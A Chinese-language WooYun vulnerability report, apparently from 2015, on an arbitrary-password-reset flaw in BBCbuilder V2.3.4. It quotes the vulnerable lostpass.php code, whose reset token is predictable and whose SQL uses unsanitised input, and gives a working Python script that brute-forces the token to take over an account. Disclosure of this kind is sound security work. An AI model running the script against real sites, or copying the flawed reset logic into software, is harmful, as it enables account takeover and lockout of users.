BBCbuilder重置任意用户密码(附脚本) | wooyun-2015-0109422| WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0109422

漏洞标题：BBCbuilder重置任意用户密码(附脚本)

漏洞作者： darker

提交时间：2015-04-24 15:51

修复时间：2015-07-23 16:16

公开时间：2015-07-23 16:16

漏洞类型：设计缺陷/逻辑错误

危害等级：高

自评Rank：20

漏洞状态：厂商已经确认

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

2015-04-24：细节已通知厂商并且等待厂商处理中
2015-04-24：厂商已经确认，细节仅向厂商公开
2015-04-27：细节向第三方安全合作伙伴开放
2015-06-18：细节向核心白帽子及相关领域专家公开
2015-06-28：细节向普通白帽子公开
2015-07-08：细节向实习白帽子公开
2015-07-23：细节向公众公开

简要描述：

最新版。BCbuilder V2.3.4

详细说明：

lostpass.php

if(!empty($_POST["action"])&&$_POST["action"]=="submit")
{
$info=explode("|",$_POST["userid"]);
$sql="select * from ".MEMBER." where userid='$info[0]'";
$db->query($sql);
$re=$db->fetchRow();
if($re["userid"])
{
$md5=md5(time().rand(0,100));
$md5='lock'.substr($md5,5,strlen($md5));
$db->query("update ".MEMBER." SET password='$md5' where userid='$info[0]'");
$mail_temp=get_mail_template('find_pwd');
$con=$mail_temp['message'];
$url=$config['weburl']."/lostpass.php?md5=$md5&userid=$re[userid]";
$url="<a target='_blank' href='".$url."'>".$url."</a>";
$ar1=array('[sitename]','[username]','[findurl]','[contact]');
$ar2=array($config['company'],$re['user'],$url,$re['name']);
$con=str_replace($ar1,$ar2,$con);
send_mail($info[1],$re["user"],$config['company']." PASSWORD",$con);
$tpl->assign("email",$info[1]);
}
else
msg("lostpass.php");
$tpl->assign('p_email',$info[1]);
$page="lostpass_steptwo.htm";
}

直接发送请求，无需验证。。。（遍历一遍userid，全站用户都无法登陆了）
看另外一段代码。

if(!empty($_POST['resetpass'])&&!empty($_POST['newpass'])&&!empty($_GET['md5']))
{
if($_POST['newpass']!=$_POST['newpass1'])
msg("lostpass.php?msg=1&userid=$_GET[userid]&md5=$_GET[md5]");
else
{
$db->query("update ".MEMBER." set password='".md5($_POST['newpass'])."'
		           where userid='$_GET[userid]' and password='$_GET[md5]'");
msg("lostpass.php?msg=2");
}
}

ok。
流程如下，发送请求，重置某uid 密码。密码为
$md5=md5(time().rand(0,100));
$md5='lock'.substr($md5,5,strlen($md5));
= =时间戳+rand 100，无压力，爆破。

漏洞证明：

验证脚本:
可能会有些延迟，适当修改增加now。

#coding=utf-8
import time
import datetime
import urllib2, urllib
import hashlib
now=int(time.mktime(datetime.datetime.now().timetuple()))
print now
data = {'action' : 'submit', 'userid' : '1'}
f = urllib2.urlopen(
        url     = 'http://localhost/bbcbuilderv.2.3.4/lostpass.php',
        data    = urllib.urlencode(data)
        )
for i in range(0, 100 + 1):
    s=hashlib.md5(str(now)+str(i)).hexdigest()
    s="lock"+s[5:]
    data = {'resetpass' : '1','newpass' : '123456','newpass1':'123456'}
    f = urllib2.urlopen(
        url     = 'http://localhost/bbcbuilderv.2.3.4/lostpass.php?userid=1&md5='+s,
        data    = urllib.urlencode(data)
            )

修复方案：

随机数弄长点？重置密码请求再加个验证？

版权声明：转载请注明来源 darker@乌云

漏洞回应

厂商回应：

危害等级：低

漏洞Rank：2

确认时间：2015-04-24 16:15

厂商回复：

正在处理中

WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0109422

漏洞标题：BBCbuilder重置任意用户密码(附脚本)

相关厂商：shop-builder.cn

漏洞作者： darker

提交时间：2015-04-24 15:51

修复时间：2015-07-23 16:16

公开时间：2015-07-23 16:16

漏洞类型：设计缺陷/逻辑错误

危害等级：高

自评Rank：20

漏洞状态：厂商已经确认

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 darker@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

WooYun.org

漏洞概要 关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0109422

漏洞标题：BBCbuilder重置任意用户密码(附脚本)

相关厂商：shop-builder.cn

漏洞作者： darker

提交时间：2015-04-24 15:51

修复时间：2015-07-23 16:16

公开时间：2015-07-23 16:16

漏洞类型：设计缺陷/逻辑错误

危害等级：高

自评Rank：20

漏洞状态：厂商已经确认

Tags标签： 无

4人收藏 收藏 var token=""; var id="wooyun-2015-0109422"; $(".btn-fav").click(function(){ CollectBug(id,token); }); 分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 darker@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞概要关注数(24) 关注此漏洞

Tags标签：无

4人收藏收藏
分享漏洞：